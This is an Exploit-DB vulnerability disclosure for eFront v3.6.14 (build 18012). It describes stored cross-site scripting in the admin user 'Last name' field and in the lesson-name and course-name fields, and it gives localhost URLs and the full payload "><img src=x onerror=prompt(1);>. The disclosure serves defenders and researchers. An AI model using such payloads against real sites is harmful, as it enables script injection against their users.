########################################################### EDB Note: Screenshot provided by exploit author. ########################################################### [~] Exploit Title: eFront v3.6.14 (build 18012) -Stored XSS in multiple Parameters [~] Author: sajith [~] version: eFront v3.6.14- build 18012 [~]Vendor Homepage: http://www.efrontlearning.net/ [~] vulnerable app link:http://www.efrontlearning.net/download ########################################################### POC by sajith shetty: [###]Log in with admin account and create new user http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=personal&user=root&op=profile&add_user=1 (Home ? Users ? Administrator S. (root) ? New user) Here "Last name" field is vulnerable to stored XSS [payload:"><img src=x onerror=prompt(1);> ] [###]create new lesson option ( http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php ? ctg=lessons&add_lesson=1) where "Lession name" is vulnerable to stored xss [payload:"><img src=x onerror=prompt(1);> ] [###]create new courses option( http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php ? ctg=courses&add_course=1) where "Course name:" filed is vulnerable to stored XSS